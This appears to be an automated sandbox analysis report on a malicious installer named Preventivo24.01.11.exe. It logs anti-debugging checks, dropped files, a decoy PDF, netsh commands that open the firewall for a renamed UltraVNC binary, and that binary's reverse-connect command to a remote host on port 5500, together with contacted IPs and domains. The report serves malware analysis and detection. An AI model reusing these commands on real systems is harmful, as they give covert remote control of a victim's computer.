Source: C:\Users\user\Desktop\Preventivo24.01.11.exe File opened: C:\Users\user\AppData\Roaming\Photo and Fax Vn\Photo and vn 1.1.2\install\F97891C\WindowsVolume\ Jump to behavior
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe File opened: C:\Users\user\AppData\Roaming\Photo and Fax Vn\Photo and vn 1.1.2\install\F97891C\WindowsVolume\Games\ Jump to behavior
Source: Preventivo24.01.11.exe, 00000000.00000003.2018539158.000000000B305000.00000004.00001000.00020000.00000000.sdmp, taskhost.exe, 0000002A.00000002.3219628836.000000000070C000.00000002.00000001.01000000.0000000D.sdmp, taskhost.exe.0.dr Binary or memory string: , (Hyper-V Tools)
Source: Preventivo24.01.11.exe, 00000000.00000003.2018539158.000000000B305000.00000004.00001000.00020000.00000000.sdmp, taskhost.exe, 0000002A.00000002.3219628836.000000000070C000.00000002.00000001.01000000.0000000D.sdmp, taskhost.exe.0.dr Binary or memory string: , (Hyper-V Server)
Source: viewer.exe, 00000010.00000002.3220368505.0000000001449000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: _VMware_
Source: Preventivo24.01.11.exe, Preventivo24.01.11.exe, 00000000.00000002.2033997046.0000000005506000.00000004.00000020.00020000.00000000.sdmp, Preventivo24.01.11.exe, 00000000.00000002.2033997046.0000000005553000.00000004.00000020.00020000.00000000.sdmp, Preventivo24.01.11.exe, 00000000.00000003.2031375134.0000000005553000.00000004.00000020.00020000.00000000.sdmp, Preventivo24.01.11.exe, 00000000.00000003.1988431156.0000000005554000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: Preventivo24.01.11.exe, 00000000.00000003.2018539158.000000000B305000.00000004.00001000.00020000.00000000.sdmp, taskhost.exe, 0000002A.00000002.3219628836.000000000070C000.00000002.00000001.01000000.0000000D.sdmp, taskhost.exe.0.dr Binary or memory string: Service Pack: 6aService Pack: 1aService Pack:%d.%dService Pack:%dService Pack:0.%d, (Storage Server Enterprise), (Storage Server Express), (Storage Server Standard), (Storage Server Workgroup), (Storage Server Essentials), (Storage Server), (Home Server Premium Edition), (Home Server Edition), (Terminal Services), (Embedded), (Terminal Services in Remote Admin Mode), (64 Bit Edition), (Media Center Edition), (Tablet PC Edition), (Compute Cluster Edition), (Foundation Edition), (MultiPoint Premium Edition), (MultiPoint Edition), (Security Appliance), (BackOffice), (N Edition), (E Edition), (Hyper-V Tools), (Hyper-V Server), (Server Core), (Uniprocessor Free), (Uniprocessor Checked), (Multiprocessor Free), (Multiprocessor Checked), (Windows Essential Business Server Manangement Server), (Windows Essential Business Server Messaging Server), (Windows Essential Business Server Security Server), (Cluster Server), (Small Business Server), (Small Business Server Premium), (Prerelease), (Evaluation), (Automotive), (China), (Single Language), (Win32s), (Education), (Industry), (Student), (Mobile), (IoT Core), (Cloud Host Infrastructure Server), (S Edition), (Cloud Storage Server), (PPI Pro), (Connected Car), (Handheld)Failed in call to GetOSVersion
Source: Preventivo24.01.11.exe, 00000000.00000002.2033997046.000000000552D000.00000004.00000020.00020000.00000000.sdmp, Preventivo24.01.11.exe, 00000000.00000003.1988431156.0000000005533000.00000004.00000020.00020000.00000000.sdmp, Preventivo24.01.11.exe, 00000000.00000003.2031375134.000000000552D000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWKe%
Source: taskhost.exe, 0000002A.00000002.3221941378.0000000000EEF000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe Process information queried: ProcessInformation Jump to behavior
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Code function: 0_2_00BEF843 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_00BEF843
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Code function: 0_2_00B56910 CreateFileW,GetLastError,OutputDebugStringW,OutputDebugStringW,SetFilePointer,OutputDebugStringW,WriteFile,FlushFileBuffers,WriteFile,FlushFileBuffers,WriteFile,FlushFileBuffers,WriteFile,FlushFileBuffers, 0_2_00B56910
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Source: C:\Games\taskhost.exe Code function: 42_2_005A57B0 GetPrivateProfileStringA,WTSGetActiveConsoleSessionId,KiUserCallbackDispatcher,GetCurrentProcessId,ProcessIdToSessionId,CreateToolhelp32Snapshot,Process32First,CloseHandle,Process32Next,ProcessIdToSessionId,Process32Next,CloseHandle,CloseHandle, 42_2_005A57B0
Contains functionality to dynamically determine API calls
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Code function: 0_2_00B20CA0 LoadLibraryW,GetProcAddress,FreeLibrary, 0_2_00B20CA0
Contains functionality to read the PEB
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Code function: 0_2_00BEA1CE mov esi, dword ptr fs:[00000030h] 0_2_00BEA1CE
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Code function: 0_2_00C047DA mov eax, dword ptr fs:[00000030h] 0_2_00C047DA
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Code function: 0_2_00C04796 mov eax, dword ptr fs:[00000030h] 0_2_00C04796
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Code function: 0_2_00BF5EA4 mov ecx, dword ptr fs:[00000030h] 0_2_00BF5EA4
Source: C:\Games\viewer.exe Code function: 7_2_0099B9CA mov eax, dword ptr fs:[00000030h] 7_2_0099B9CA
Source: C:\Games\viewer.exe Code function: 7_2_00993C84 mov eax, dword ptr fs:[00000030h] 7_2_00993C84
Source: C:\Games\taskhost.exe Code function: 42_2_006BC838 mov eax, dword ptr fs:[00000030h] 42_2_006BC838
Source: C:\Games\taskhost.exe Code function: 42_2_006AD615 mov ecx, dword ptr fs:[00000030h] 42_2_006AD615
Source: C:\Games\taskhost.exe Code function: 42_2_006BC7F4 mov eax, dword ptr fs:[00000030h] 42_2_006BC7F4
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Code function: 0_2_00BEA23A GetProcessHeap,HeapAlloc,GetProcessHeap,HeapFree, 0_2_00BEA23A
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Code function: 0_2_00A22520 __set_se_translator,SetUnhandledExceptionFilter, 0_2_00A22520
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Code function: 0_2_00BEACAE SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 0_2_00BEACAE
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Code function: 0_2_00A25180 __set_se_translator,SetUnhandledExceptionFilter, 0_2_00A25180
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Code function: 0_2_00BEF843 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_00BEF843
Source: C:\Games\viewer.exe Code function: 7_2_00989256 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 7_2_00989256
Source: C:\Games\viewer.exe Code function: 7_2_00985248 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 7_2_00985248
Source: C:\Games\viewer.exe Code function: 7_2_009853DE SetUnhandledExceptionFilter, 7_2_009853DE
Source: C:\Games\viewer.exe Code function: 7_2_009847F5 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 7_2_009847F5
Source: C:\Games\taskhost.exe Code function: 42_2_0069C87C IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 42_2_0069C87C
Source: C:\Games\taskhost.exe Code function: 42_2_00698A67 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 42_2_00698A67
Contains functionality to launch a program with higher privileges
Source: C:\Games\viewer.exe Code function: 7_2_00965210 GetWindowsDirectoryW,GetForegroundWindow,ShellExecuteExW,ShellExecuteExW,WaitForSingleObject,GetExitCodeProcess,CloseHandle,GetModuleHandleW,GetProcAddress,CloseHandle,Sleep,Sleep,EnumWindows,BringWindowToTop, 7_2_00965210
Creates a process in suspended mode (likely to inject code)
Source: C:\Games\viewer.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Games\cmmc.cmd" " Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c Set GUID[ 2>Nul Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c Reg Query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Profiles" /S /V Description Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\wbem\WMIC.exe wmic process where (name="taskhost.exe") get commandline Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\findstr.exe findstr /i "taskhost.exe" Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\AppData\Local\Temp\~.pdf Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Games\viewer.exe C:\Games\viewer.exe /HideWindow C:\Games\c.cmd Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 1 Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /im rundll32.exe /f Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 2 Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /im rundll32.exe /f Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 2 Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /im rundll32.exe /f Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 2 Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe Reg Query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Profiles" /S /V Description Jump to behavior
Source: C:\Games\viewer.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Games\c.cmd" " Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\mode.com Mode 90,20 Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c Set GUID[ 2>Nul Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c Reg Query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Profiles" /S /V Description Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" type C:\Games\cmd.txt" Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Games\viewer.exe C:\Games\viewer.exe /HideWindow C:\Games\once.cmd Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Games\viewer.exe C:\Games\viewer.exe /HideWindow C:\Games\cmmc.cmd Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 20 Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 20 Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 20 Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\findstr.exe findstr /i "taskhost.exe" Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe Reg Query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Profiles" /S /V Description
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\mode.com Mode 90,20
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\netsh.exe netsh firewall add allowedprogram program="C:\Games\taskhost.exe" name="MyApplication" mode=ENABLE scope=ALL
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\netsh.exe netsh firewall add allowedprogram program="C:\Games\taskhost.exe" name="MyApplicatio" mode=ENABLE scope=ALL profile=ALL
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\wbem\WMIC.exe wmic process where (name="taskhost.exe") get commandline
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\findstr.exe findstr /i "taskhost.exe"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Games\taskhost.exe C:\Games\taskhost.exe -autoreconnect ID:5402254 -connect vnvariant2024.ddnsfree.com:5500 -run
Source: C:\Games\viewer.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Games\once.cmd" "
Source: C:\Games\viewer.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Games\cmmc.cmd" "
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c Set GUID[ 2>Nul
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c Reg Query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Profiles" /S /V Description
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\wbem\WMIC.exe wmic process where (name="taskhost.exe") get commandline
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\findstr.exe findstr /i "taskhost.exe"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe Reg Query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Profiles" /S /V Description
Uses taskkill to terminate processes
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /im rundll32.exe /f Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /im rundll32.exe /f Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /im rundll32.exe /f Jump to behavior
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Process created: C:\Windows\SysWOW64\msiexec.exe c:\windows\system32\msiexec.exe" /i "c:\users\user\appdata\roaming\photo and fax vn\photo and vn 1.1.2\install\f97891c\main1.msi" ai_setupexepath=c:\users\user\desktop\preventivo24.01.11.exe setupexedir=c:\users\user\desktop\ exe_cmd_line="/exenoupdates /forcecleanup /wintime 1706007874 " ai_euimsi="
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Process created: C:\Windows\SysWOW64\msiexec.exe c:\windows\system32\msiexec.exe" /i "c:\users\user\appdata\roaming\photo and fax vn\photo and vn 1.1.2\install\f97891c\main1.msi" ai_setupexepath=c:\users\user\desktop\preventivo24.01.11.exe setupexedir=c:\users\user\desktop\ exe_cmd_line="/exenoupdates /forcecleanup /wintime 1706007874 " ai_euimsi=" Jump to behavior
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Code function: 0_2_00B19280 GetCurrentProcess,OpenProcessToken,GetLastError,GetTokenInformation,GetLastError,GetTokenInformation,AllocateAndInitializeSid,EqualSid,FreeSid,GetLastError,FindCloseChangeNotification, 0_2_00B19280
Source: Preventivo24.01.11.exe, 00000000.00000003.2018539158.000000000B305000.00000004.00001000.00020000.00000000.sdmp, taskhost.exe, 0000002A.00000002.3219628836.000000000070C000.00000002.00000001.01000000.0000000D.sdmp, taskhost.exe.0.dr Binary or memory string: Program Manager
Source: Preventivo24.01.11.exe, 00000000.00000003.2018539158.000000000B305000.00000004.00001000.00020000.00000000.sdmp, taskhost.exe, taskhost.exe, 0000002A.00000002.3219628836.000000000070C000.00000002.00000001.01000000.0000000D.sdmp, taskhost.exe.0.dr Binary or memory string: Shell_TrayWnd
Source: Preventivo24.01.11.exe, 00000000.00000003.2018539158.000000000B305000.00000004.00001000.00020000.00000000.sdmp, taskhost.exe, 0000002A.00000002.3219628836.000000000070C000.00000002.00000001.01000000.0000000D.sdmp, taskhost.exe.0.dr Binary or memory string: Progman
Source: Preventivo24.01.11.exe, 00000000.00000003.2018539158.000000000B305000.00000004.00001000.00020000.00000000.sdmp, taskhost.exe, 0000002A.00000002.3219628836.000000000070C000.00000002.00000001.01000000.0000000D.sdmp, taskhost.exe.0.dr Binary or memory string: UltraVNC.ini -settingshelperShell_TrayWnd%dpasswdUltraVNCpasswd2isWritablePermissions{34F673E0-878F-11D5-B98A-00B0D07B8C7C}
Source: taskhost.exe.0.dr Binary or memory string: Program ManagerProgmanSHELLDLL_DefViewFolderViewSysListView32BlockInputtimerscreenupdatemouseupdateuser1user2quitplaceholder1placeholder2restartvncDesktop::~vncDesktop : ~vncDesktop
Contains functionality to query CPU information (cpuid)
Source: C:\Games\viewer.exe Code function: 7_2_00985448 cpuid 7_2_00985448
Contains functionality to query locales information (e.g. system language)
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Code function: GetLocaleInfoW,GetLocaleInfoW, 0_2_00B4B480
Source: C:\Games\viewer.exe Code function: GetLocaleInfoW, 7_2_0099F04D
Source: C:\Games\viewer.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP, 7_2_0099F173
Source: C:\Games\viewer.exe Code function: GetLocaleInfoW, 7_2_0099F279
Source: C:\Games\viewer.exe Code function: GetLocaleInfoW, 7_2_009983B3
Source: C:\Games\viewer.exe Code function: GetLocaleInfoEx,___wcsnicmp_ascii, 7_2_0098433F
Source: C:\Games\viewer.exe Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW, 7_2_0099F348
Source: C:\Games\viewer.exe Code function: GetLocaleInfoEx,GetLocaleInfoEx,GetLocaleInfoW, 7_2_0098440A
Source: C:\Games\viewer.exe Code function: GetACP,IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW, 7_2_0099E9E7
Source: C:\Games\viewer.exe Code function: EnumSystemLocalesW, 7_2_0099EC89
Source: C:\Games\viewer.exe Code function: EnumSystemLocalesW, 7_2_0099ECD4
Source: C:\Games\viewer.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW, 7_2_0099EDFA
Source: C:\Games\viewer.exe Code function: EnumSystemLocalesW, 7_2_0099ED6F
Source: C:\Games\viewer.exe Code function: EnumSystemLocalesW, 7_2_00997E3A
Queries the volume information (name, serial number etc) of a device
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\netsh.exe Queries volume information: C:\ VolumeInformation
Source: C:\Games\taskhost.exe Queries volume information: C:\ VolumeInformation
Source: C:\Games\taskhost.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Code function: 0_2_00B63AD0 CreateNamedPipeW,CreateFileW, 0_2_00B63AD0
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Code function: 0_2_00B56820 GetLocalTime, 0_2_00B56820
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Code function: 0_2_00B62440 GetUserNameW,GetLastError,GetUserNameW,GetEnvironmentVariableW,GetEnvironmentVariableW,RegDeleteValueW,RegCloseKey,RegQueryInfoKeyW,RegCloseKey,RegCloseKey,RegDeleteKeyW,RegCloseKey,RegDeleteValueW,RegCloseKey, 0_2_00B62440
Source: C:\Games\viewer.exe Code function: 7_2_009987C3 _free,_free,_free,GetTimeZoneInformation,_free, 7_2_009987C3
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Code function: 0_2_009E7AA0 GetVersionExW,GetVersionExW,IsProcessorFeaturePresent, 0_2_009E7AA0

Lowering of HIPS / PFW / Operating System Security Settings
barindex
Modifies the windows firewall
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\netsh.exe netsh firewall add allowedprogram program="C:\Games\taskhost.exe" name="MyApplication" mode=ENABLE scope=ALL
Uses netsh to modify the Windows network and firewall settings
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\netsh.exe netsh firewall add allowedprogram program="C:\Games\taskhost.exe" name="MyApplication" mode=ENABLE scope=ALL

Remote Access Functionality
barindex
Contains VNC / remote desktop functionality (version string found)
Source: taskhost.exe, 0000002A.00000002.3221941378.0000000000EEF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: RFB 003.008
Source: taskhost.exe, 0000002A.00000002.3223498876.000000000361D000.00000004.00000010.00020000.00000000.sdmp String found in binary or memory: RFB 003.008
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1379424 Sample: Preventivo24.01.11.exe Startdate: 23/01/2024 Architecture: WINDOWS Score: 84 88 www.example.com 2->88 90 vnvariant2024.ddnsfree.com 2->90 100 Snort IDS alert for network traffic 2->100 102 Multi AV Scanner detection for dropped file 2->102 104 Multi AV Scanner detection for submitted file 2->104 13 viewer.exe 1 2->13         started        15 Preventivo24.01.11.exe 73 2->15         started        signatures3 process4 dnsIp5 19 cmd.exe 3 3 13->19         started        98 www.example.com 93.184.216.34, 49705, 80 EDGECASTUS European Union 15->98 80 C:\Users\user\AppData\...\vnchooks.dll, PE32 15->80 dropped 82 C:\Users\user\AppData\Roaming\...\viewer.exe, PE32 15->82 dropped 84 C:\Users\user\AppData\...\taskhost.exe, PE32 15->84 dropped 86 6 other files (none is malicious) 15->86 dropped 22 msiexec.exe 2 15->22         started        file6 process7 signatures8 106 Uses cmd line tools excessively to alter registry or file data 19->106 108 Uses netsh to modify the Windows network and firewall settings 19->108 110 Modifies the windows firewall 19->110 24 viewer.exe 1 19->24         started        26 cmd.exe 1 19->26         started        29 Acrobat.exe 8 63 19->29         started        31 11 other processes 19->31 process9 signatures10 33 cmd.exe 1 24->33         started        118 Uses cmd line tools excessively to alter registry or file data 26->118 35 reg.exe 1 26->35         started        37 AcroCEF.exe 29->37         started        process11 process12 39 cmd.exe 33->39         started        41 viewer.exe 33->41         started        43 cmd.exe 33->43         started        49 8 other processes 33->49 46 AcroCEF.exe 37->46         started        dnsIp13 51 taskhost.exe 39->51         started        55 mode.com 39->55         started        57 netsh.exe 39->57         started        65 3 other processes 39->65 59 cmd.exe 41->59         started        120 Uses cmd line tools excessively to alter registry or file data 43->120 61 reg.exe 43->61         started        96 184.25.164.138, 443, 49725 BBIL-APBHARTIAirtelLtdIN United States 46->96 63 cmd.exe 49->63         started        signatures14 process15 dnsIp16 92 vnvariant2024.ddnsfree.com 140.228.29.110, 49726, 5500 OARNET-ASUS United States 51->92 94 127.0.0.1 unknown unknown 51->94 114 Contains functionalty to change the wallpaper 51->114 116 Contains VNC / remote desktop functionality (version string found) 51->116 67 cmd.exe 59->67         started        70 conhost.exe 59->70         started        72 cmd.exe 59->72         started        76 2 other processes 59->76 74 conhost.exe 63->74         started        signatures17 process18 signatures19 112 Uses cmd line tools excessively to alter registry or file data 67->112 78 reg.exe 67->78         started        process20
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
184.25.164.138
 unknown United States
9498 BBIL-APBHARTIAirtelLtdIN false
93.184.216.34
 www.example.com European Union
15133 EDGECASTUS false
140.228.29.110
 vnvariant2024.ddnsfree.com United States
600 OARNET-ASUS false

Private

IP
127.0.0.1

Contacted Domains

Name IP Active
www.example.com 93.184.216.34 true
vnvariant2024.ddnsfree.com 140.228.29.110 true

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://www.example.com/download/updates.txt false
    		high